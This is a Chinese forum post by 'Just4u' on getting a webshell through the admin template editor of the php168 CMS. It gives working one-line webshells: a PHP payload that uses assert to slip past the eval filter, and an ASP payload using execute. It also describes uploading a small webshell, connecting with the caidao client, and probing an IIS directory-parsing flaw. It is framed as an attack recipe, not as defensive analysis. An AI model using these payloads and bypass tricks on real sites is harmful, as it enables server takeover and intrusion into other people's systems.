php168新版后台模板拿shell 技巧

摘要：php168新版后台模板拿shell技巧 ,PHP类漏洞,安全周边,溜客安全信息网 ...

文章作者:Just4u

本人一向没什么技术文章,只是一个技巧,欢迎各位补充指点
刚刚看了黑影小子渗透cmd5的文章,说后台模板那块和谐了eval
我刚刚在官网下载了php168的系统本地搭建起来.
主要看了一下后台模板那里
我们新建一个页面试试

 

打开生成的文件如同黑影小子所说eval被和谐

 

那怎么办呢

第一种方法...
意思大家都懂我也就不一一截图了
既然是只过滤了eval函数那有没有一个函数可以替代eval函数呢？
这个可以有那就是assert函数
ok新建页面那里文件
文件名aaa.php
内容

<?php assert($_POST[cmd]);?>

打开目录里生成的文件查看

 

代码完好
这里要说明一下
直接用那网页版的php客户端连接有可能出现错误提示
用菜刀就行了嘛..证实此一句话可用 如图

第二种方法...
如果如果服务器支持asp
我们可以在新建页面那里尝试写入asp一句话
因为asp里面的execute函数也可以替代eval且未被过滤
新建xx.asp 写入<%execute request("3est")%>
用菜刀连接成功
这个就不截图了....
这里多说一点
上次拿一个phpcms的还是php什么的站点
具体哪个系统我也忘了
新建页面写入一句话之后
打开写入一句话的文件发现系统给加了exit函数
这种情况下如果支持asp
那么新建asp一句话木马就可以突破

第三种方法...
新建页面这里不用一句话
直接上小马
asp和php小马都测试成功..
上一个图就ok

 

上述三种方法测试成功

还有一个是偶然发现的没来得及测试
就是新建页面那里有一个
在线上传
但是只允许上传zip格式的文件

 

提交之后会在程序目录生成一个以模板路径为名字的文件夹。比如我这个就会在目录生成ccc.php的文件夹，但是我打包上传的文件都未在那个文件夹里显示。
经监控是是放在tmp目录里了，有兴趣的可以继续看看能否利用ccc.php这样的iis解析漏洞...